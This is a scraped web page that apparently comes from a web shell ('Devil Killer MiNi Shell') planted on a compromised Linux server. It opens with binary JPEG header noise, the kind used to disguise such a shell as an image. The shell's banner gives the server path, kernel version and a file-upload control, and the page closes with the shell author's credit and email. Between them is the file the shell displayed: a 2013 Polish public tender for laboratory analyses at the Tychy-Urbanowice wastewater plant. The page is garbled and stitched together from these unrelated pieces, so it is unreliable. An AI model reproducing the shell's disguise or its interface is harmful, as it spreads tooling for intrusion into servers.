JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130124/13239-N-2013.html

<p class="kh_header"><b>Tychy: Wykonywanie analiz laboratoryjnych dla Oczyszczalni Ścieków Tychy-Urbanowice</b><br>
<b>Numer ogłoszenia: 13239 - 2013; data zamieszczenia: 24.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. , Al. J. Marszałka Piłsudskiego 12, 43-100 Tychy, woj. śląskie, tel. 032 3257235, faks 032 3257285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna utworzona w celu zaspakajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie analiz laboratoryjnych dla Oczyszczalni Ścieków Tychy-Urbanowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres zamówienia:
Część 1 zamówienia - Wykonywanie analiz laboratoryjnych ścieków, osadów ściekowych, wód podziemnych i powierzchniowych, odpadów oraz rudy darniowej dla Oczyszczalni Ścieków Tychy-Urbanowice.
1A. Analizy ścieków:
a) ChZTCr - 100 analiz/rok,
b) BZT5 - 100 analiz/rok,
c) Zawiesina ogólna - 100 analiz/rok,
d) Azot ogólny (z rozbiciem na azot amonowy, azotynowy, azotanowy, Kjeldahla) - 100 analiz/rok,
e) Fosforany rozpuszczone - 100 analiz/rok,
f) Fosfor ogólny - 100 analiz/rok,
g) Substancje ropopochodne - 100 analiz/rok.
2A. Analiza ścieków w zakresie: fenole lotne, chlorki, siarczany, rtęć, kadm, cynk, miedź, nikiel, chrom, ołów, arsen, wanad, srebro, heksachlorocykloheksan (HCH), tetrachlorometan (czterochlorek węgla - CCl4), pentachlorofenol (PCP), aldryna, dieldryna, endryna, izodryna, heksachlorobenzen (HCB), heksachlorobutadien (HCBD), trichlorometan (chloroform - CHCl3), 1,2-dichloroetan (EDC), trichloroetylen (TRI), tetrachloroetylen (nadchloroetylen - PER), trichlorobenzen (TCB)- 4 analizy/rok. 
3A. Analiza osadu ściekowego w zakresie wynikającym z Rozporządzenia Ministra Środowiska z dnia 13 lipca 2010 r. w sprawie komunalnych osadów ściekowych (Dz.U. 2010 nr 137 poz. 924) wraz z wydaniem opinii - 8 analiz/rok.
4A. Analiza osadu odwodnionego ściekowego w zakresie: Escherichia Coli- 8 analiz/rok.
5A. Analiza osadów ściekowych w zakresie: Enterokoki- 12 analiz/rok.
6A. Analiza wód podziemnych w zakresie: odczyn, przewodność elektryczna właściwa PEW, ołów, kadm, miedź, cynk, chrom VI, rtęć, bor, sód, magnez, glin, potas, wapń, mangan, ogólny węgiel organiczny OWO, wodorowęglany, ortofosforany, chlorki, siarczany, amoniak, azotyny, azotany, indeks fenolowy, substancje powierzchniowo czynne- anionowe- 4 analizy/rok.
7A. Analiza wód powierzchniowych w zakresie: ChZTCr, BZT5, zawiesina ogólna, azot ogólny (z rozbiciem na azot amonowy, azotynowy, azotanowy, Kjeldahla), fosforany rozpuszczone, fosfor ogólny, substancje ropopochodne- 4 analizy /rok.
8A. Badania odpadów: o kodzie 19 08 01- Skratki oraz 19 08 02- Zawartość piaskowników w zakresie określonym w Rozporządzeniu Ministra Gospodarki z dnia 8 stycznia 2013r. w sprawie kryteriów oraz procedur dopuszczania odpadów do składowania na składowisku odpadów danego typu (Dz. U. 2013 nr 0 poz. 38) - 4 analizy/rok.
9A. Analizy rudy darniowej: oznaczenie żelaza ogólnego, żelaza Fe2+, pH wyciągu wodnego, pozostałość nierozpuszczalna w HCl, wilgotność - 5 analiz/rok
Część 2 zamówienia - Wykonywanie analiz laboratoryjnych biogazu i pomiar emisji zanieczyszczeń gazowych do atmosfery dla Oczyszczalni Ścieków Tychy-Urbanowice.
1B. Analiza biogazu:
a) Przed instalacją odsiarczania H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] - 12 analiz/rok.
b) Za instalacją odsiarczania: O2 [%], CO [%], CO2 [%], CH4 [%], H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] formaldehyd [mg/Nm3], amoniak [mg/Nm3], wilgotność, wartość opałowa [MJ/Nm3] - 12 analiz/rok,
c) Za instalacją odsiarczania: badanie związków krzemu w zakresie: tetrametylosilan, trimetylosilanol, heksametylodisiloksan, heksametylocyklotrisiloksan, oktametylotrisiloksan, oktametylocyklotetrasiloksan, dekametylotetrasiloksan, dekametylocyklopentasiloksan - 4 analizy/rok.
d) Z modelu laboratoryjnego komór fermentacyjnych w zakresie: O2 [%], CO [%], CO2 [%], CH4 [%], H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] formaldehyd [mg/Nm3], amoniak [mg/Nm3], wilgotność, wartość opałowa [MJ/Nm3], ciepło spalania [MJ/Nm3], wielkość próbki ca. 1,0 dm3/h- 56 analiz/rok
2B. Analiza spalin - pomiar emisji zanieczyszczeń w zakresie wynikającym z Rozporządzenia Ministra Środowiska z dnia 19.11.2008 r. w sprawie rodzajów wyników pomiarów prowadzonych w związku z eksploatacją instalacji lub urządzenia i innych danych oraz terminów i sposobów ich prezentacji (Dz.U. 2008 nr 215 poz. 1366):
a) CO, CO2, NOx, SO2, pyły- 8 analiz/rok
Część 3 zamówienia - Wykonywanie analiz laboratoryjnych oleju silnikowego dla Oczyszczalni Ścieków Tychy-Urbanowice 
1C. Badanie oleju silnikowego w zakresie: 
IpH, żelazo, ołów, miedź, cyna, chrom, glin, nikiel, bor, sód, krzem obcy, zawartość wody, płyn chłodzący, liczba kwasowa, liczba zasadowa, lepkość w 400C, lepkość w 1000C, wskaźnik lepkości, stopień oksydacji oleju, oksydacja oleju netto, stopień nitrowania oleju netto w porównaniu ze wzorcem oleju oraz wydanie opinii, czy dany olej nadaje się do dalszego stosowania w silnikach opalany biogazem- 30 analiz /rok
2. Informacje szczegółowe dotyczące zamówienia opisano w pkt. III.2 siwz
3. Metodyka badawcza opisana w pkt. III.3. siwz
4. Wymagania dotyczące akredytacji opisane zostały w pkt. III.4. siwz
5. Wymagania dot. podwykonawców opisane zostaływ pkt. III.5. siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium dla poszczególnych części zamówienia wynosi:
Część 1 - 600,00 PLN (słownie: sześćset złotych), 
Część 2 - 1.000,00 PLN (słownie: jeden tysiąc złotych),
Część 3 - 900,00 PLN (słownie: dziewięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek jeżeli złoży podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek jeżeli złoży:  
- podpisane oświadczenie, iż posiada w zakresie niniejszego zamówienia niezbędną wiedzę i doświadczenie - załącznik nr 2 siwz oraz,
- wykaz wykonanych usług dla Część 1 zamówienia, w którym:
a) potwierdzi należyte wykonanie analiz laboratoryjnych ścieków w pełnym zakresie określonym w pkt. III.1.1A. lit. a)-g) siwz w ilości co najmniej 50 analiz/rok - osobno dla każdego parametru, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
b) potwierdzi należyte wykonanie analiz laboratoryjnych ścieków w pełnym zakresie określonym w pkt. III.1.2A. siwz w ilości co najmniej 2 analiz/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
c) potwierdzi należyte wykonanie analiz laboratoryjnych osadu ściekowego w pełnym zakresie określonym w pkt. III.1.3A. siwz w ilości co najmniej 
4 analiz/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
d) potwierdzi należyte wykonanie analiz laboratoryjnych wód podziemnych w pełnym zakresie określonym w pkt. III.1.6A. siwz w ilości co najmniej 
2 analiz/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
W celu wykazania wymaganej przez Zamawiającego ilości analiz Zamawiający dopuszcza łączenie umów/zleceń wykonanych na rzecz różnych podmiotów. 
W treści załącznika nr 5A do siwz tj. wykaz wykonanych usług dla części 
1 zamówienia, do każdej wykonanej usługi należy dopisać jej przedmiot, datę wykonania i odbiorcę oraz załączyć dokument, potwierdzający, że usługa 
ta została wykonana należycie.
- wykaz wykonanych usług dla Części 2 zamówienia, w którym:
e) potwierdzi należyte wykonanie analiz laboratoryjnych biogazu w zakresie parametrów:  H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3], O2 [%], CO [%], CO2 [%], CH4 [%],formaldehyd [mg/Nm3], amoniak [mg/Nm3], wilgotność, wartość opałowa [MJ/Nm3], ciepło spalania [MJ/Nm3], badanie związków krzemu w zakresie: tetrametylosilan, trimetylosilanol, heksametylodisiloksan, heksametylocyklotrisiloksan, oktametylotrisiloksan, oktametylocyklotetrasiloksan, dekametylotetrasiloksan, dekametylocyklopentasiloksan w ilości co najmniej 3 analiz dla każdego z w/w parametru/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
f) potwierdzi należyte wykonanie analiz laboratoryjnych spalin w pełnym zakresie określonym w pkt. III.1.2B. siwz, w ilości co najmniej 3 analiz/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
W celu wykazania wymaganej przez Zamawiającego ilości analiz Zamawiający dopuszcza łączenie umów/zleceń wykonanych na rzecz różnych podmiotów. 
W treści załącznika nr 5B do siwz tj. wykaz wykonanych usług dla części 2 zamówienia, do każdej wykonanej usługi należy dopisać jej przedmiot, datę wykonania i odbiorcę oraz załączyć dokument, potwierdzający, że usługa ta została wykonana należycie.
- wykaz wykonanych usług dla Części 3 zamówienia, w którym:
g) potwierdzi należyte wykonanie analiz laboratoryjnych oleju silnikowego 
w pełnym zakresie określonym w pkt. III.1.1C. siwz w ilości co najmniej 
8 analiz/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
W celu wykazania wymaganej przez Zamawiającego ilości analiz Zamawiający dopuszcza łączenie umów/zleceń wykonywanych na rzecz różnych podmiotów,  pod warunkiem, że analizy zostały zakończone.    
W treści załącznika nr 5C do siwz tj. wykaz wykonanych usług dla części 3 zamówienia, do każdej wykonanej usługi należy dopisać jej przedmiot, datę wykonania i odbiorcę oraz załączyć dokument, potwierdzający, że usługa ta została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek jeżeli złoży podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek jeżeli złoży podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek jeżeli złoży podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 2 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) Ważny Certyfikat Akredytacji Laboratorium Badawczego Wykonawcy, wraz 
z zakresem akredytacji na analizy, na które Wykonawca składa ofertę (co do których Zamawiający wymaga akredytacji), wydany przez Polskie Centrum Akredytacji lub inne jednostki certyfikujące, będące sygnatariuszami wielostronnego porozumienia EA lub ILAC. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, zgodnie z pkt.VI.9. siwz.  
b) W przypadku, gdy Wykonawca zamierza wykonać badania w zakresie określonym w pkt. III.1.1A lit. a)-g) siwz, pkt. III.1.2A. siwz, pkt. III.1.7A siwz, pkt. III.1.6A siwz, pkt. III.1.4A siwz według własnych procedur badawczych, Zamawiający wymaga, aby Wykonawca złożył oświadczenie (załącznik nr 8 do siwz), że stosowane przez Wykonawcę własne procedury badawcze, są zgodne z metodami podanymi w odpowiednich rozporządzeniach - nie dotyczy parametru azot ogólny, jako sumy azotu azotynowego, azotanowego, Kjeldahla (nie jest wymieniony w rozporządzeniu)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz Oferty - załącznik nr 1 do siwz 
2) Zestawienie cenowe - załącznik nr 1A - dla części 1; załącznik nr 1B - dla części 2 zamówienia, załącznik nr 1C - dla części 3 zamówienia.  
3) Pisemne zobowiązanie innego podmiotu w zakresie wiedzy i doświadczenia - Załącznik nr 6.
4) Upoważnienie dla osoby/osób do podpisania oferty oraz do występowania w imieniu Wykonawcy, jeżeli nie wynika to z innych dołączonych dokumentów-załącznik nr 4.
5) W przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 u.p.z.p.
6) Dokument potwierdzający wniesienie wadium zgodnie z pkt. VIII.1. siwz
7) Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w art.22 ust.1 u.p.z.p. polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust.2b u.p.z.p., zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw do wykluczenia z postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą wymaganych dokumentów potwierdzających brak podstaw do wykluczenia określonych w pkt.VI.2 ust.1)-2) siwz dotyczących każdego z tych podmiotów, o ile podmioty te będą brały udział w realizacji części zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy jest dopuszczalna w następujących przypadkach:
a) konieczność wprowadzenia zmian do umowy w następstwie siły wyższej tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia m.in. katastrofa naturalna, katastrofalne działania przyrody np. ulewne opady deszczu, nadzwyczajne, ponadnormatywne opady śniegu, niezwykłe mrozy, strajk, zamieszki uliczne, pożar, powódź, eksplozja, atak terrorystyczny,
b) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
c) jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), dla faktur wystawionych po zmianie stawki podatku, podatek VAT będzie obliczony w obowiązującej stawce, bez konieczności zmiany umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rcgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. w Tychach przy Al. Marszałka Piłsudskiego 12, pokój nr 414-Sekretariat, IV piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2013 godzina 10:00, miejsce: Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. w Tychach przy Al. Marszałka Piłsudskiego 12, pokój nr 414-Sekretariat, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. Zamawiający nie przewiduje zawarcia umowy ramowej. Nie dotyczy finansowania projektu/programu ze środków Unii Europejskiej. Data zamieszczenia niniejszego ogłoszenia w Biuletynie Zamówień Publicznych: 24.01.2013r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com